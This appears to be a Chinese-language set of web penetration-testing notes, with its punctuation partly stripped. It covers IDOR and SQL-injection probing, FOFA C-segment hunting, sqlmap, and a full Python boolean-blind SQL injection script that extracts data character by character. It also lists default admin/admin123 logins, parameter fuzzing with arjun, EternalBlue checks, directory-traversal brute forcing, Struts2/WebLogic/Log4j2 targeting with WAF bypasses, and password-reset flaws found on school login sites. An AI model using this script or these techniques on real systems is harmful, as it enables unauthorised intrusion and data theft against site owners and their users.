
上一章讲了尝试id越权 或者sql注入 比如单引号试试 或者 单引号/逗号1/,1还有------假如 1 2 3 失败可以尝试1.11111111111111111111111111111111111的小数点越权1234-1发现有可能有就去fofa找c 段然后sqlmap 小线程 关注是否是盲注然后让ai生成盲注脚本包括csdn的deepseek也是能白嫖的语法该网站的ip/24 port80 status_code200import sys import requests URL http://127.0.0.1/index.php?id1 条件为真时页面会出现的特征文本需要按目标页面调整 TRUE_FLAG Welcome def check(payload): params {id: payload} resp requests.get(URL, paramsparams, timeout5) return TRUE_FLAG in resp.text 1. 先判断是否存在布尔盲注 if not check(1 and 11) or check(1 and 12): print([-] 未发现布尔盲注) sys.exit(1) print([] 发现布尔盲注开始猜解) def get_length(query): low, high 0, 100 while low high: mid (low high) // 2 payload f1 and length(({query})){mid} if check(payload): low mid 1 else: high mid return low def get_text(query): result for i in range(1, 60): low, high 32, 127 while low high: mid (low high) // 2 payload f1 and ascii(mid(({query}),{i},1)){mid} if check(payload): low mid 1 else: high mid if low 32: break result chr(low) return result query select version() length get_length(query) text get_text(query) print(f[] 结果长度: {length}) print(f[] 猜解结果: {text})后台管理adminadmin123相同id尝试相同密码找一个WordPress站---------------------------------------------然后的话有一些网站的参数 类似id 但是后面跟的不是什么123我们就尝试使用工具fuzz一波工具明arjun -u http://ip/saddsa/sadsad/index!?FUZZ1FUZZ的地方是爆破所需参数的地方nmap -o -0Pn ip ping不通做这个不链接的扫描看主机那边是win还是linux发现是win 2008 7 8.1 尝试是否有永恒之蓝17-010尝试遍历//dsad/sadsadsa/sadsad/file$1$放到burp的攻击模块尝试爆破爆破路径去Directory Traversal 里面寻找 然后使用py脚本或者ai 让路径多加一点../../../../../或者路径里面直接添加挖漏洞就是要学会fuzz10 -20 延迟1millisecons跑出来200 跑不出来404-------------------------------------------------观察资产url猜漏洞 根据经验 猜中间件漏洞 一个stu2 一个weblogic log4j2 还有弱口令和简单的xss以及注册的逻辑漏洞 注册后发现能上传文件 尝试文件上传漏 洞使用liqun 发现有stu2 不行的话添加恶意字符 ##号 之类绕waf 和weblogic只要一个站点有这个洞 其他action一般都有stu2文件上传尝试----------------------------------------------发现ip有漏洞如何反查域名去微步里面搜索 这个ip查到域名 然后反去fofa搜索host*.域名-----------------------------------------------------------一个小学初中 高中 网站 登录的学校代码查询打开bp随便输入学校代码 正确输入验证码代码成功是验证码 错误 错误是验证码正确然后fuzz到网站有个这个直接学校代码查询接口尝试sql 和 恶意参数% burp直接发现信息泄露还有个重置密码发现任意密码重置信息收集无非就是横扫c段